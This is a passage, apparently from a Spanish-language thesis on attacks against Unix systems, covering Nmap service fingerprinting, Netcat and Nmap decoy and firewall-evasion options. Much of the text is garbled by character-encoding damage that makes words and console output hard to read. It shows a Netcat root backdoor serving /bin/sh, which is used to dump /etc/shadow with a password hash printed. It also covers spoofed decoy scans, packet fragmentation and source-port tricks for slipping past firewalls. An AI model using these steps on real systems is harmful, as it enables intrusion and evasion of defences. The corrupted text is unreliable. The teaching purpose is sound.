ente# se env)an los "robes seleccionados ' al co "arar las res"uestas con la base "ara ver si $a' coincidencias# las "osibilidades vuelven a ser tres% <.7.=a' coincidencia co "leta. ,e ter ina el anlisis "ara este "uerto. <.+.=a' coincidencia "arcial. ,e restringen los "robes a realizar co o se describi8 en el "aso -.2 ' se continGa al "aso 5. <.;.@o $a' coincidencia. ,e salta al "aso 5. . En la a'or)a de los casos a esta altura 'a $ubo algGn ti"o de coincidencia. ,in e bargo# aqu) es donde se to a el conjunto de probes restantes "endientes de "rueba*2. ' se ejecutan. :a desventaja de llegar a este "unto es que no se "ueden reutilizar las cone9iones establecidas
**0 :a coincidencia co "leta o CduraD es aquella que logra identi/icar la "osibles% qu ,o/tIare envi8 los datos ' su versi8n e9acta o con el ,? en el que corre# 8dulos del servicio inclu)dos# etc. a'or cantidad de datos

u' a"ro9i ada# junto a veces

*2. En esta instancia este conjunto de probes restantes "endientes de ejecuci8n se /iltra "revia ente "or el valor de rarit1 ;CrarezaD> que se utiliza en la detecci8n. Fodos los "robes que tengan rarit1 igual o enor al valor del escaneo# quedan seleccionados.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O1 de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

"revia ente# 'a que se $an enviado datos anterior ente ' esto "uede CensuciarD o corro "er la "ruebaH es as) que "or cada probe "endiente se establece una nueva cone9i8n. #. ,i no es "osible reconocer qu servicio se encuentra del otro lado de la cone9i8n ;no $ubo ninguna coincidencia> ' "or otro lado se cuenta con alguna res"uesta a algGn probe# @ a" "ro'ecto. AGn si se llega al "unto 5# es i "ortante destacar que @ a" intenta acelerar el test co "leto en todo sentido# contando con una base de /ir as o"ti izadas ' bien organizadas# 'endo de lo es"ec)/ico. Fa bin cuenta con s genrico ' utilizado a lo u' s uestra "or consola el /inger"rint res"ectivo "ara que el usuario env)e dic$a /ir a a los desarrolladores del

u' "oderosas ' verstiles ca"acidades de

elaboraci8n de reglas# co o las o"ciones de softmatc ' rarit1)A)H alteraci8n del /lujo descri"to en caso de contingencias con la sentencia fallbackH so"orte de scri"ts "ara "rocesa iento "ost(detecci8n "or si las e9"resiones regulares no son su/icientes "ara detectar ciertos servicios# etc. :as directivas

s i "ortantes de la base de /ir as*22 son%


-T,PFKDP0 TDe !rip!i%n>FT.tring a en@iar>F

4ro(e: ,inta9is% Probe El string a enviar "er ite caracteres t)"icos de esca"e# co o ff# ft# fn ' f9== "ara los nG eros $e9adeci ales. matc9: ,inta9is% mat!' !erl% m;-eDpre
TnombreA er@i!io>FTpatr%n>F-informa!i%n 7e @er i%n0

El "atr8n de coincidencia consiste en una e9"resi8n regular# en /or ato


i%n0;-op!ione 0.

:a in/or aci8n de versi8n "uede utilizar

las coincidencias de la e9"resi8n regular ; ediante las variables g*# g2#


*2* Fodos los probes "oseen un valor de rarit1# que en un escaneo se lo con/igura con el "ar etro version'intensit'# ' va del . al 0. Establecerlo en . resulta "uede tardar uc$o s# "ero ser ca"az de detectar servicios enos que un 5anner @rabbing# 'a que s8lo lo "osee el @ull !robe. ,i se establece el intensit1Crarit1 en 0# @ a" u' "oco /recuentes en "uertos u' "oco /recuentes ta bin. :a intensidad "or de/ecto es de +. *22 !ara otras directivas# co o rarit1# "orts# so/t atc$# /allbac6# etc.# re/erirse a la docu entaci8n ;aunque se deducen de los e9"licado aqu)>% $tt"%&&n a".org&vscan& Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O5 de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

etc.> ' ade s "er ite de/inir ca "os co o resultado ;Cno bre de "roductoD# CversionD# Cin/oD# Csiste a o"erativoD# etc.>. En la Consola *0 se uestra un eje "lo de la /or a en que @ a" al acena

tanto los probes co o el anlisis de las res"uestas gracias a la sentencia matc . Bsica ente la estructura consiste en%

@ull !robe _ ?"ciones del !robe b Conjunto !robe A _ ?"ciones del !robe b Conjunto S...T !robe B _ ?"ciones del !robe b Conjunto de

atc$ del @ull !robe. atc$ del !robe B.

atc$ del !robe A

El "ri er "robe del arc$ivo es el @ull# seguido "or unos cuantos matc con 5anners de los servicios de FF!# ,,=# ,MF! ' L@C. En el segundo !robe se a"recian las directivas de nivel de rarit1 ' de "uertos t)"icos donde el Pet<equest tiene a'or "robabilidad de coincidencia# junto con un atc$ es"ec)/ico "ara el ,ervidor 4eb C$ero6ee.
N Nmap er@i!e 7ete!tion probe "i t -Q- mo7e: fun7amenta"L -QN M87: nmap- er@i!e-probe 6))0 (00)-03-0) 05:+0:13U 7oug M ?...@ N T'i i t'e NK22 probe t'at Yu t !ompare anE banner gi@en to u *robe 2$* 9F77 3OO N &ait for at "ea t 6 e!on7 for 7ata. 8t u e7 to be 54 but ome N mtp er@i!e 'a@e "ate"E been in tituting an artifi!ia" pau e 9 ee N B<#TK$<9JgreetApau eJ: in .en7mai"4 for eDamp"e: tota">aitm 6000 ?...@ mat!' ftp m;W((0-- 0.QBTP er@er [9=er ion 9>u---.[>0P:; p;&K-BTPD; @; M1; o;KniD; ?...@ mat!' ' mFW..?-9-[7.0P:-Open..?A9-[>.0P: BreeC.D-9-[70P:[nF p;Open..?; @;M(; i;BreeC.D M3L proto!o" M1; o;BreeC.D; ?...@ mat!' mtp mFW((0 --[>A0P <.3TP 9--[>A.0P: [9Debian;HNK[:[r[nF p;Po tfiD mtp7; ';M1; o;2inuD; i;Debian; ?...@ mat!' @n! mFW$BC 003[.009[7:[nMF p;=N,; i;proto!o" 3.M1; ?...@ *robe 2$* Bet/e3uest 3OBC2 / K22*/1.0PrPnPrPnO raritE 1 port 14704794)0)54))4113413941+34()04+974505451+451545+0455+45914631?...@ "port ++3 ?...@ mat!' 'ttp mFW?TTP;1[.0 [7[7[7 .Q[r[n.er@er: ,'ero6ee;9[7--.[>0P:[r[nF p;,'ero6ee 'ttp7; @;M1;

Consola *0% Finger"rints de ,ervicios de @Ma"% arc$ivo de Probes ' <es"uestas

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. OJ de 22O

Ca")tulo J. ( Ca")tulo J. ,o/tIare "ara <econoci iento Activo

/ap6tulo #. Ao=t@are para Reconocimiento Activo


2na vez recorridas las tcnicas s "o"ulares de releva iento activo de in/or aci8n de una red ' $ost objetivo en su /aceta te8rica# en este ca")tulo se "rovee una "equeBa reco"ilaci8n e introducci8n del so/tIare general ente utilizado "ara uno o varios objetivos descri"tos "revia ente% Escaneo de "uertos r"ido# "reciso ' sigiloso. 5etectar ' Evitar los 75,s&7!,s# etc.

ecanis os de de/ensa% /ireIalls# routers#

A"rovec$ar las debilidades del objetivo. Construir $erra ientas "ersonalizadas $aciendo uso de la ca"acidad de reutilizaci8n ' auto atizaci8n de otras s genricas.

J.*. @etcat
@etcat*2- es quiz la $erra ienta s verstil ' "o"ular que e9iste "ara ejorada ' $ac6ear en la redH tanto es as) que se lo suele conocer co o la Cnavaja suiza ultiusoD. :a versi8n original ;que data de *00J> /ue "osterior ente ada"tada "or varios desarrolladores ' "ro'ectos# "or lo que sus derivados "ueden encontrarse bajo el no bre de nc, ncat, pnetcat, socat, sock, socket ' sbd
S47R7U@CT#

ade s del @GU netcat)AIH todas son versiones que se encuentran a'or)a de los ,iste as ?"erativos ti"o 2ni9.

a "lia ente dis"onibles en la

,u "ro"8sito es servir de C"uenteD "ara enviar ' recibir datos v)a cone9iones FC! o 25!# en /or a interactiva ;desde la consola> o desde scri"ts ' "rogra as. !or eje "lo# ' s8lo "ara dar una idea de su /unciona iento# su co "orta iento "or de/ecto es ace"tar datos "or la entrada estndar *25 ' enviarlos "or una cone9i8n establecida# a la salida estndar. 5e esta ientras que lo que recibe "or la is a lo redirige anera logra ser e9tre ada ente /le9ible ' ada"table

a un sinnG ero de situaciones# 'a que la cone9i8n "uede ser FC! o 25!. Co o analog)a# sirve "ensar en que es un s) il al co ando de 2ni9 CcatD *2J "ero que inclu'e en sus "osibilidades a los soc6ets FC! ' datagra as 25!.
*2- @etcat original% $tt"%&&III.vulnIatc$.org&netcat& *21 P@2 @etcat% $tt"%&&netcat.source/orge.net& *25 Ler Plosario% Entrada Estndar ;,F57@># ,alida Estndar ;,F5?2F># ,alida de Estndar de Errores ;,F5E<<># "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O+ de 22O

Ca")tulo J. ( J.*.@etcat

Entre sus usos t)"icos ' "osibles se encuentra% *. !robar ' e9"lorar "osibilidades con a"licaciones de red# siendo netcat el so/tIare que si ule ser el cliente o servidor. 2. C5ialogarD anual ente con un servicio so/tIare en un "rotocolo inteligible "ara un usuario tcnico# co o "or eje "lo =FF!# !?!-# ,MF!# FF!# etc. Ler Consola 2.. -. ,ervir de back door. Al estar inclu)do "or de/ecto en la a'or)a de versiones de 2ni9# es "robable que un atacante luego de obtener acceso a un servidor con/igure un netcat "ara servir un s$ell re oto ;Consola 2*># arc$ivos del servidor co "ro etido# o cualquier otra /unci8n. 1. 2tilizarlo de !ro9' de ,oc6ets ;o cone9iones>% !or eje "lo# si se necesita redirigir una cone9i8n desde 7nternet a una quina es"ec)/ica de la :A@ que se encuentra detrs de un $ost $aciendo @AF *2+# netcat se "uede utilizar en dic$o $ost "ara redirigir una cone9i8n $acia el destino /inal dentro de la :A@. :o interesante de esto es que netcat no necesitar de "rivilegios de ad inistrador# "udiendo realizarlo cualquier usuario no "rivilegiado*2O. 5. Escaneo de "uertos% ,i no se dis"one de @ a" o algGn otro "ort scanner# @etcat "osee ca"acidades de escaneador de "uertos. Ler Consola 22. J. !ost(intrusi8n% ,i se logra co "ro eter un $ost# es reco endable to ar las "recauciones del caso antes de enviar al "ara is o un 6it de $erra ientas a'or anlisisH consu ir "oco anc$o de banda de la red objetivo es

una de ellas# "or lo que una versi8n de @etcat co "ilado esttica ente *20
*2J Cat% Co ando 2ni9 que concatena una entrada a la salida estndar. :a entrada "uede ser un arc$ivo ;uno de los ele entos que son "ilares del odelo 2ni9>. *2+ Ler Plosario% @AF N @etIor6 Address Franslation# "g. 2**. *2O Cualquier "rogra a con "rivilegios de usuario Cno(rootD "uede escuc$ar "or cone9iones entrantes en "uertos a'ores a *.21H sta es una li itaci8n del eje "lo. Ade s# si se "oseen s sencillo realizar la redirecci8n de cone9iones o ento de traducirse de c8digo /uente a c8digo de "er isos de ad inistrador en el equi"o# es *20 Ejecutable esttico% A un "rogra a# en el

odi/icando las reglas de /iltrado del nGcleo ;i"tables&net/ilter# !F# 7"/I# AC:s# etc.>. quina ;eta"a de co "ilaci8n># se lo enlaza a la o las bibliotecas de c8digo de las cuales de"ende "ara "oder ejecutarse correcta ente. Este enlace "uede ser esttico o din ico. Cada uno tiene ventajas ' desventajas
S,2@U:7@RT

. En este caso se "ro"one la utilizaci8n de un

ejecutable esttico "ara de"ender lo

enos "osible del siste a o"erativo ' el so/tIare

instalado en el siste a co "ro etido. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,taticUlibrar' Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. OO de 22O

Ca")tulo J. ( J.*.@etcat

brindar un e9celente balance entre ta aBo ' "restaciones.


marcelo@saturno:~$ !at > goog"eA7i!tA ear!'.tDt BC2 /searcIQ3RSuanTperez marcelo@saturno:~$ marcelo@saturno:~$ n! >>>.goog"e.!om )0 T goog"eA7i!tA ear!'.tDt ?TTP;1.0 (00 O5 Date: .un4 (3 3ar (00) (0:56:5) H3T ,ontent-TEpe: teDt;'tm"L !'ar et18.O-))59-1 ,a!'e-,ontro": pri@ate .et-,oo6ie: P$<B18D13((17+5)5576b67(:T311(063060+5:2311(063060+5:.1D>NttP@OqAT/G.aL eDpire 1Tue4 (3-3ar-(010 (1:00:+5 H3TL pat'1;L 7omain1.goog"e.!om .et-,oo6ie: ..1R01an='biC>UG_"egL pat'1; ear!' .er@er: g> T'tm">T'ea7>Tmeta 'ttp-equi@1!ontent-tEpe !ontent1VteDt;'tm"L !'ar et18.O-))59-1V>Ttit"e>Yuan pereO - Hoog"e .ear!'T;tit"e> ... marcelo@saturno:~$ n! pop.mai".Ea'oo.!om.ar 110 PO5 'e""o from popgate (.3).7 on pop110.p"u .mai".mu7.Ea'oo.!om F-C/ SuanNperez@DaIoo.com.ar PO5 pa >or7 require7. *%-- pepe -<$$ in@a"i7 u er;pa >or7 F-C/ Suanperez PO5 pa >or7 require7. *%-- Suancito PO5 mai"7rop rea7E4 + me age 9(3+)) o!tet : 91)09057 (60)33()00: list PO5 + me age 9(3+)) o!tet : 1 3)13 ( 6(17 3 3793 + 77+5 . 3uit PO5 er@er igning off. marcelo@saturno:~$

Consola 2.% @etcat co o cliente de a"licaciones de red# en este caso =FF! ' !?!-

En la Consola 2. se

uestra una sesi8n =FF! "ri ero ' !?!- des"us#

a bas manuales. En negrita estn los co andos ejecutados "or el usuario# ' "osterior ente las res"uestas devueltas "or el servidor. Es interesante observar que cierta in/or aci8n Gtil se "uede obtener anejando estos "rotocolos a bajo nivel# lo que se describi8 co o Banner Prabbing en el a"artado 5.2.*.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O0 de 22O

Ca")tulo J. ( J.*.@etcat

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0. de 22O

Ca")tulo J. ( J.*.@etcat
!-er<idor" root@ubuntu&ser<er:~$ >'i"e -- ` -e ;tmp;.!errar -e ;bin; 'L 7one

00L7o n! -" -p 15679

!$liente" marcelo@saturno:~$ n! 19(.16).0.60 15679 ls &l tota" 10+ 7r>Dr-D--- 3 mar!e"o mar!e"o +096 (007-01-(7 16:56 !omp"etoAgrafi!o.'tm" -r>-r--r-- 1 mar!e"o mar!e"o +(+)( (007-01-(7 16:56 !omp"eto.'tm" -r>------- 1 mar!e"o mar!e"o (00)0 (007-01-(7 16:56 !omp"eto.nbe -r>-r--r-- 1 mar!e"o mar!e"o 11)1) (007-01-(7 15:17 7efau"tfu""p"ugin .'tm" -r>-r--r-- 1 mar!e"o mar!e"o 1301+ (007-01-(7 1+:3) 7efau"t.'tm" 7r>Dr-Dr-D ( mar!e"o mar!e"o +096 (007-01-(7 16:3( eDp"oit 7r>Dr-Dr-D ( mar!e"o mar!e"o +096 (007-01-(7 13:05 too" p>d ;'ome;mar!e"o Iostname ubuntu- er@er uname &a 2inuD ubuntu- er@er (.6.15-51- er@er N1 .3P Tue Beb 1( 17:1(:1) KT, (00) i6)6 HNK;2inuD !$trlT$" marcelo@saturno:~$ n! 19(.16).0.60 15679 > er@erA 'a7o> !at ;et!; 'a7o> tou!' ;tmp;.!errar !$trlT$" marcelo@saturno:~$ nc 192.168.0.60 11609 9KN5NO&N: -19(.16).0.600 15679 9*: : ,onne!tion refu e7 marcelo@saturno:~$ !at er@erA 'a7o> root:Q:135(6:0:99999:7::: 7aemon:Q:135(6:0:99999:7::: bin:Q:135(6:0:99999:7::: E :Q:135(6:0:99999:7::: En!:Q:135(6:0:99999:7::: game :Q:135(6:0:99999:7::: man:Q:135(6:0:99999:7::: "p:Q:135(6:0:99999:7::: mai":Q:135(6:0:99999:7::: ne> :Q:135(6:0:99999:7::: uu!p:Q:135(6:0:99999:7::: proDE:Q:135(6:0:99999:7::: >>>-7ata:Q:135(6:0:99999:7::: ba!6up:Q:135(6:0:99999:7::: "i t:Q:135(6:0:99999:7::: ir!:Q:135(6:0:99999:7::: gnat :Q:135(6:0:99999:7::: nobo7E:Q:135(6:0:99999:7::: 7'!p:`:135(6:0:99999:7::: E "og:`:135(6:0:99999:7::: 6"og:`:135(6:0:99999:7::: mar!e"o:M1Mt03?R#'BM;,P;>(t>5$n1DGr_P0eB(1:135+0:0:99999:7::: '7:`:135+0:0:99999:7::: ftp:`:139++:0:99999:7::: marcelo@saturno:~$

Consola 2*% Consola <e ota v)a @etcat. En negrita estn los co andos ti"eados "or el cliente

En la Consola 2* se

uestra otro eje "lo de uso de @etcat# esta vez

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0* de 22O

Ca")tulo J. ( J.*.@etcat

relacionado con la sencilla e9tracci8n de in/or aci8n re ota de un equi"o# co o es el caso de una "uerta trasera ;back door>. !ri ero se ejecuta en el servidor un loop ;bucle> donde sie "re se sirven cone9iones ;en este caso se "oseen "er isos de root> $asta que no e9ista el arc$ivo &t "&.cerrar. :uego# desde el nodo cliente# el usuario se conecta a dic$o servidor ' ejecuta di/erentes co andos que son inter"retados "or &bin&s$. ,i bien "osterior ente se /inaliza la cone9i8n con un Ctrl_C# gracias a que el netcat en el servidor se encuentra dentro de un bucle I$ile ;' a que sigue sin e9istir el arc$ivo &t "&.cerrar># el cliente se "uede volver a conectar# esta vez redirigiendo la salida a un arc$ivo. As) se obtiene el arc$ivo de s$adoI *-. en el servidor. !or Glti o se crea el arc$ivo &t "&.cerrar con el co ando touc$# ' se veri/ica que la "uerta trasera $a'a quedado cerrada.*-*
marcelo@saturno:~$ u7o n! -@@ -O -p )0 19(.16).0.30 (1 53 79-)( !i!"on -19(.16).0.300 (1 9ftp: open !i!"on -19(.16).0.300 53 97omain: open !i!"on -19(.16).0.300 )( 9*: : ,onne!tion refu e7 !i!"on -19(.16).0.300 )1 9*: : ,onne!tion refu e7 !i!"on -19(.16).0.300 )0 9>>>: : ,onne!tion refu e7 !i!"on -19(.16).0.300 79 9finger: : ,onne!tion refu e7 ent 04 r!@7 0 marcelo@saturno:~$ u7o n! -@@ -O -p )0 19(.16).0.30 (1 53 79-)( ent 04 r!@7 0 !$trlT$" marcelo@saturno:~$ u7o n! -@@ -O -p )0 -> 5 19(.16).0.30 (1 53 79-)( !i!"on -19(.16).0.300 (1 9ftp: open !i!"on -19(.16).0.300 53 97omain: open !i!"on -19(.16).0.300 )( 9*: : ,onne!tion time7 out !i!"on -19(.16).0.300 )1 9*: : ,onne!tion time7 out !i!"on -19(.16).0.300 )0 9>>>: : ,onne!tion time7 out !i!"on -19(.16).0.300 79 9finger: : ,onne!tion time7 out ent 04 r!@7 0 marcelo@saturno:~$

Consola 22% Escaneo si "le de "uertos con @etcat

En esta Glti a consola se el escaneo de "uertos# "or

uestra otra caracter)stica incor"orada de netcat%

edio de la o"ci8n (z ;"or C $ero'6C? modeD ( Modo de

entrada&salida cero>. El "ri er eje "lo escanea los "uertos destino 2*# 5- ' el rango +0 al O2 de la 7! *02.*JO...-.# /ijando el "uerto origen al O. ;'a que "uede "asar "or edio de algunos /ireIalls sin estado>H la o"ci8n (vv $ace que se

*-. Arc$ivo s ado.% Arc$ivo de contraseBas del siste a o"erativo# al acenado en /or a de C/unci8n resu enD o as , Es necesario "oseer "er isos de root "ara leerlo. *-* ,i bien la "uerta trasera qued8 cerrada# a /ines de conseguir e/ectiva ente $izo. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 02 de 22O a'or si "licidad en el eje "lo se $an obviado "asos que di/icultar)an al ad inistrador el rastreo de qu es lo que el atacante

Ca")tulo J. ( J.*.@etcat

uestre

s in/or aci8n "or consola del "rogreso de la o"eraci8n. is a 7!# "ero en este

En el segundo eje "lo se intenta nueva ente con la

caso se "uede a"reciar qu sucede si el objetivo "osee un /ireIall con "ol)ticas de 5<?!% @etcat queda CbloqueadoD en un "uerto /iltrado es"erando a que e9"ire la cone9i8n "ara "asar al siguiente. !ara evitar esto se "uede establecer el ti eout con el "ar etro (I# que en el tercer intento se estableci8 en 5 segundos. ,i bien es interesante la variedad de "osibilidades que o/rece @etcat# es i "ortante resaltar que los escaneos que realiza son del Fi"o Connect# "or lo que son los s CruidososD en cuanto al tr/ico ' logs generados.

J.2. @ a" N Ms ?"ciones


,i bien en el ca")tulo anterior se describieron las di/erentes varias o"ciones ' ca"acidades gr/ica. aneras que un s el "ort scanner t)"ica ente obtiene in/or aci8n del objetivo# @ a" en s) "osee s que "er iten ajustar ' "ersonalizar "roceso de "ort scanning# o $acerlo s sencillo e intuitivo gracias a su inter/az

J.2.*. 5eco's ;o C,eBuelosD>


@ a" "er ite $acer el "ort scanning agregndole CseBuelosD al "roceso# es decir# 9aciendo que pare3ca para el destino que el portscan proviene de di=erentes I4s adems de la del atacante. Esto lo logra $aciendo spoofing de una o varias 7!s ;co o en el 7dle ,can># ' generando tr/ico co o si varios escaneos de "uertos se $icieran al is o tie "o desde di/erentes lugares. ,i bien esta tctica "uede con/undir al objetivo en la identi/icaci8n del origen del "ortscan# la direcci8n 7! donde se ejecuta @ a" debe ser inclu)da# 'a que de otra anera @ a" no "odr)a obtener resultados. Ade s# es i "ortante s evidencia indicando el origen del uestra en la que los $osts que real ente utilizan las 7!s /alsi/icadas e9istan ' estn activos# 'a que de otra /or a el escaneo dejar)a "ortscanH "uede verse uno de los Consola 2-. 2na o"ci8n adicional que se ve en la is a es que es "osible indicarle a @ a" en qu orden ubicar el "ortscan real ;no /alsi/icando la 7! de origen>#
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0- de 22O

otivos en los A<! requests que $ace el

objetivo en la Ca"tura *5# "roducto de la ejecuci8n de @ a" que se

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

ubicando CMED en la lista de deco's. 5e lo contrario la ubicaci8n ser aleatoria.


marcelo@saturno:~/src/nmap/bin$ sudo ./nmap &< &s- &) 192.168.0.1005192.168.0.205GC 192.168.0. 0 &p 21522580 .tarting Nmap +.60 9 'ttp:;;nmap.org : at (00)-0+-07 ((:53 #$T 8nitiating #$P Ping .!an at ((:53 .!anning 19(.16).0.30 -1 port0 ,omp"ete7 #$P Ping .!an at ((:534 0.03 e"ap e7 91 tota" 'o t : 8nitiating ./N .tea"t' .!an at ((:53 .!anning !i!"on 919(.16).0.30: -3 port 0 Di !o@ere7 open port (1;t!p on 19(.16).0.30 Di !o@ere7 open port ((;t!p on 19(.16).0.30 ,omp"ete7 ./N .tea"t' .!an at ((:534 (.33 e"ap e7 93 tota" port : ?o t !i!"on 919(.16).0.30: appear to be up ... goo7. 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< (1;t!p open ftp ((;t!p open ' )0;t!p fi"tere7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: $ea7 7ata fi"e from: ;'ome;mar!e"o; r!;nmap; 'are;nmap Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in (.)70 e!on7 $a> pa!6et ent: (( 9966C: F $!@7: 3 9130C: marcelo@saturno:~/src/nmap/bin$

Consola 2-% !ortscan en @ a" con 5eco's

En la Ca"tura *5# donde se "uede a"reciar un escaneo con 5eco's# interactGan los siguientes $osts% A> ?rigen @ a"% 7! *02.*JO...2 N MAC address% ..%*+%-*%0J%5b%*/ B> 7! Falsi/icada *% *02.*JO...*.. N MAC address% ..%.c%20%0.%2a%2d C> 7! Falsi/icada 2% *02.*JO...2. N MAC address% ..%.c%20%OJ%*2%a5> =ost ?bjetivo% *02.*JO...-. N MAC address% ..%.c%20%e*%a2%2J :o interesante es que co o se detall8 en el 7dle ,can ;"gina 5*># todo $ost que recibe un ,K@_ACR devuelve un <,F al origen. @ a"# aGn cuando el ,K@_ACR le es Gtil ' su/iciente "ara deter inar que el "uerto est abierto# si ula el co "orta iento que ado"ta el resto de los $osts cu'as 7!s /ueron /alsi/icadas ;"aquetes 2- ' 20># es decir# env)a un <,F ta bin. Co o "rinci"al desventaja al $abilitar esta o"ci8n en un "ortscan se "uede que conlleva. En negrita se indican algunos "untos interesantes de la ca"tura# co o el s"oo/ing ' las "eticiones A<! contestadas "or el $ost CoriginalD. encionar la lentitud

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 01 de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 05 de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0J de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones


?...@ Paquete Nro: 3 - Tiempo: 0.06957) 3a! Origen: 00:10: 1:96:1b:16 !%" -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 192.168.0.100:.2811 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: + - Tiempo: 0.075)30 3a! Origen: 00:0!:(9:e1:a(:(6 9D: -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6 9D: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.30 ?...@ Paquete Nro: 6 - Tiempo: 0.0771+5 3a! Origen: 00:0!:(9:90:(a:(7 9C: -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 00:0!:(9:90:(a:(7 9C: -> 8P De tino: 00:0!:(9:e1:a(:(6 9D: Proto!o"o: #$P De !rip!i%n: 192.168.0.100 is at 00:0c:29:90:2a:2d !(" ?...@ Paquete Nro: ) - Tiempo: 0.07)565 3a! Origen: 00:0!:(9:e1:a(:(6 9D: -> 3a! De tino: 00:0c:29:90:2a:2d !(" 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 ?...@ Paquete Nro: 10 - Tiempo: 0.0)0503 3a! Origen: 00:0c:29:90:2a:2d !(" &' Gac )estino: 00:0c:29:e1:a2:26 !)" 8P Origen: 192.168.0.100:+()55 -> 8P De tino: 192.168.0. 0:22 Proto!o"o: T,P De !rip!i%n: .2811 ' 22 ?/-2@ -e3R1 7enR0 ?...@ Paquete Nro: (1 - Tiempo: 0.0)77(6 3a! Origen: 00:17:31:96:5b:1f 9#: -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: (( - Tiempo: 0.0))0+6 3a! Origen: 00:0!:(9:e1:a(:(6 9D: -> 3a! De tino: 00:17:31:96:5b:1f 9#: 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: (3 - Tiempo: 0.0))06) 3a! Origen: 00:17:31:96:5b:1f 9#: -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: .2811 ' 22 ?/-2@ -e3R1 7enR0 ?...@

Ca"tura *5% Ca"tura de un ,'n ,can con 5eco's

J.2.2. Evitando FireIalls


@ a" brinda ade s algunas o"ciones que "er iten evitar el /iltrado de /ireIalls S@MA!UF4ELT# co o "or eje "lo los Csin estadoD o stateless# con/igurados# o si "le ente dbiles% al

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0+ de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

2ra)mentar los paquetes que se env)an% :a o"ci8n C(/D o C(( tuD $ace que @ a" /rag ente los "aquetes 7! en Glti"los de O# $aciendo caso o iso del MF2 que "osea con/igurada la inter/az de red. El "ri er "ar etro sirve "ara /rag entar en o//sets de O ;C(/D> o *J b'tes ;C(/ (/D># ' el segundo "ara elegir un valor "ersonalizado ;"or eje "lo# C(( tu 21D># sie "re en Glti"los de O. ,in e bargo# es i "ortante aclarar que algunos u' u' di/undidaH los /ireIalls actuales e 75,s directa ente /iltran el contenido /rag entado# 'a que es una tcnica de evasi8n resultados "ueden variar. Utili3aci-n de un puerto ori)en =ijo% ,i la red objetivo "osee un /ireIall sin estado o o 5MQ
*-2

al con/igurado# es

u' "robable que deje ingresar a la :A@ s co unes ;el 4eb>. :a

las "eticiones de cualquier 7! ' el "uerto FC! de origen O. "or

eje "lo# 'a que es uno de los ti"os de tr/ico

o"ci8n C((source("ort hnroUdeU"uertoeD o C(g hnroUdeU"uertoeD obliga a que @ a" utilice un "uerto origen /ijo en todo el escaneo# "ara tratar de /iltrarse "or estos C$uecosD. :a desventaja est en que i "ide la "aralelizaci8n del escaneo# ' "or lo tanto ser aneja t)"ica ente sobre l# es s lento. !or el lado de 25!# co o es un "rotocolo sin estado# ' 5@, es un "rotocolo que se u' Gtil co binar esta o"ci8n con el ensaje "ar etro 5-H as) se "uede si ular ante el /ireIall que el "roviene de un ,ervidor 5@, ' "asar el escaneo 25! "or l. /on=i)uraci-n del esquema de tempori3aci-n a utili3ar % ,i bien @ a" "osee uc$as o"ciones "ara con/igurar al 9i o los timers a utilizar en el "ortscan# e9isten ta bin "lantillas# esque as o templates "rede/inidos de ante ano# gracias a la o"ci8n C(F h"lantillaeD o C(FnG eroD# donde el "ar etro "uede ser% .. paranoid ;C"aranoicoD>% Es la con/iguraci8n de escaneo inutos entre probes. Evita en teor)a la gran s lenta ' conservadora "osible. Escanea los "uertos en serie# ' es"era "or 5 a'or)a de los 75,s. *. snea:! ;CcautelosoD>% Es"era "or *5 segundos entre probes# ' ta bin realiza el escaneo en serie. Es un balance entre velocidad '
